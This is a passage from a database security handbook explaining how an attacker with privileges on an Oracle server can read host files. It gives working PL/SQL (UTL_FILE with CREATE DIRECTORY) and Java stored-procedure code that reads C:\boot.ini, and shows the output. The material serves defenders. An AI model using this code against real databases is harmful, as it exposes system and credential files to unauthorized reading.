Accessing the File System | The Database Hackers Handbook: Defending Database Servers

Once a system has been compromised one of the first things an attacker might want to do is examine the file system for useful information. Like most RDBMS, Oracle provides the tools to do this and as such access should be restricted to the relevant packages. PL/SQL can be used to access the file system. UTL_FILE is the package used to do this and it can be used to read and write to files. While PUBLIC can execute UTL_FILE, the function that actually opens the file is FOPEN. This takes as one of its parameters the name of a directorynot a directory in the sense of the file system but an Oracle directory that has been created using the CREATE DIRECTORY command:

 CREATE OR REPLACE DIRECTORY THEDIR AS 'C:\';

By default, there are no directories that PUBLIC can access and PUBLIC cannot execute CREATE DIRECTORY either. This limits the risk of a low-privileged user using UTL_FILE to gain access to the file system. Of course, if a user can create a directory, then he can access the file system. The file system access is done with the privileges of the user running the main Oracle process.

 set serveroutput on CREATE OR REPLACE DIRECTORY THEDIR AS 'C:\';     DECLARE BUFFER VARCHAR2(260); FD UTL_FILE.FILE_TYPE; begin FD := UTL_FILE.FOPEN('THEDIR','boot.ini','r'); DBMS_OUTPUT.ENABLE(1000000); LOOP            UTL_FILE.GET_LINE(FD,BUFFER,254);            DBMS_OUTPUT.PUT_LINE(BUFFER); END LOOP; EXCEPTION WHEN NO_DATA_FOUND THEN      DBMS_OUTPUT.PUT_LINE('End of file.');      IF (UTL_FILE.IS_OPEN(FD) = TRUE) THEN                UTL_FILE.FCLOSE(FD);      END IF;     WHEN OTHERS THEN           IF (UTL_FILE.IS_OPEN(FD) = TRUE) THEN                UTL_FILE.FCLOSE(FD);           END IF;     END; /     [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(3)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(3)\WINNT="Microsoft Windows 2000 Server" /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /fastdetect End of file.     PL/SQL procedure successfully completed.

Java and the File System

Java can also be used to access the file system:

 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS import java.lang.*; import java.io.*;     public class JAVAREADFILE {      public static void readfile(String filename) throws IOException      {           FileReader f = new FileReader(filename);           BufferedReader fr = new BufferedReader(f);               String text = fr.readLine();;           while(text != null)           {                System.out.println(text);                text = fr.readLine();           }                          fr.close();             } } /     CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename  IN  VARCHAR2) AS LANGUAGE JAVA  NAME 'JAVAREADFILE.readfile (java.lang.String)'; /     exec dbms_java.set_output(2000); exec JAVAREADFILEPROC('C:\boot.ini')